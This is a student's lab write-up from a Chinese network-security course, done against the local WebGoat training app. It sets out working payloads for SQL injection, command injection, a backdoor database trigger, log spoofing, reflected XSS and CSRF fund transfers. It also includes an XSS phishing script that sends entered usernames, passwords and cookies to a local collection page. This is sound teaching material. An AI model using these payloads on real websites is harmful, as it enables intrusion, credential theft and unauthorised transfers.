20145222黄亚奇《网络对抗》web安全基础实践

web安全基础实践

实验后回答问题

  • (1)SQL注入攻击原理,如何防御
    原理:指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
    防御:在设计程序时,应该设计成不易篡改的或者说能有主动判断合法性的代码,并且将存有敏感信息的数据库放在防火墙内部。

  • (2)XSS攻击的原理,如何防御
    原理:是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。  
    防御:在不需要html输入的地方对html 标签及一些特殊字符( ” < > & 等等 )做过滤,将其转化为不被浏览器解释执行的字符。

  • (3)CSRF攻击原理,如何防御
    原理:一种对网站的恶意利用,CSRF可以劫持会话和cookie来冒名进行一些操作。
    防御:对web应用时进行设置,不长时间保存cookie,不访问不良网站。

实验感想

网络世界太危险,赶紧回火星。

实践过程记录

webgoat

  • 使用命令java -jar webgoat-container-7.0.1-war-exec.jar开启webgoat。
  • 在浏览器输入localhost:8080/WebGoat,直接点击登录,进去。

SQL字符串注入(String SQL Injection)

一个可以查看信用卡号的表单,当使用SQL注入(在name里输入一个永真式a or 1)时,则可以让所有的信用卡号都看得见。

数字型SQL注入(Numeric SQL Injection)

  1. 想继续用SQL注入来获取信息,然而没有输入键,就只好用kali中一个从未用过的软件(BurpSuite)来通过抓包获取数据并修改。
  2. 步骤:在BurpSuite添加一个新端口8888——设置浏览器的代理——回到webgoat,点击GO——又回到burpsuite:修改station值从为101 为 101 or 1=1,点击GO——成功。


命令注入(Command Injection)

  • 还是使用burpsuite注入:进行包分析,然后发现特征cat,注入命令AccessControlMatrix.help"&&ifconfig"(仅仅加一个&&ifconfig就行),go一下,成功!


LAB:stage 1 SQL Injection(字符串注入)

  • 与上面的字符串注入不同,用户名无法输入,所以在密码上花功夫。还是利用burpsuite代理注入。在password = ' '这里进行注入or 1=1 --这个永真式,无论什么用户名,都统统通过。

  • 登录成功!

Database Backdoors

  1. 在userid中输入101 or 1=1;--,通过。

  2. 理解题意:使用SQL语句实现:在myBackDoor表中一旦添加新用户,那么就在用户表里将新用户的邮箱改为题目固定的邮箱(暗自想:黑客“偷钱”好简单,网络安全很重要)。so,插入SQL语句就可以啦:101 or 1=1;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid;
    成功:

log Spoofing

这种攻击是一种欺骗日志的方法,操作很简单:在用户名中添加smith%0d%0aLogin Succeeded,提交就成功啦。

跨站脚本钓鱼攻击(Phishing with XSS)

  • 方法操作:在/var/www/html下编辑imgsrc.php(即一个钓鱼网站)。保存之后,在输入框中注入一段前端代码:

      <script>
  function hack(){
  str="username=" + document.phish.user.value + "&password=" + document.phish.pass.value + "" + "&ck=" + document.cookie;  
   str2="http://127.0.0.1:5320/imgsrc.php?" + str;
  
  XSSImage=new Image; 
  XSSImage.src=str2;
  alert(str2);
  }
  </script>
  
  </form><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>
  Enter Username:<br><input type="text" name="user"><br>
  Enter Password:<br><input type="password" name = "pass"><br>
  <input type="submit" name="submit" value="Login" onclick="hack()"><br>
  </form><br><br><HR>

  • 然后将提示用户输入账号口令从而完成钓鱼攻击!

  • 成功获取信息,完成钓鱼攻击:

Reflected XSS Attacks

  • 方法操作:在文本框中插入<script>alert("5222")</script>,当点击提交时,会弹出对话框。

  • 感觉这个攻击方法没有上面那个实用,虽然现在还没有想明白它可以用来干什么,但是高端玩家应该是可以利用起来的。

Cross Site Request Forgery(CSRF)

  • 实际操作:我们在message框中输入一串代码:<img src="http://localhost:8080/WebGoat/attack?Screen=484&menu=900&transferFunds=4000"/>
  • 结果:在消息列表中看到一个新的消息,点击该消息,当前页面就会下载这个消息并显示出来,转走用户的4000元,从而达到CSRF攻击的目的。

CSRF Prompt By-Pass

  • 方法操作:在massage中输入命令:

      <img src='attack?Screen=275&menu=900&transferFunds=5000'>
  
  <img src='attack?Screen=275&menu=900&transferFunds=CIONFIRM'>

  • 成功!

posted @ 2017-05-18 23:50  20145222黄亚奇  阅读(234)  评论(0编辑  收藏  举报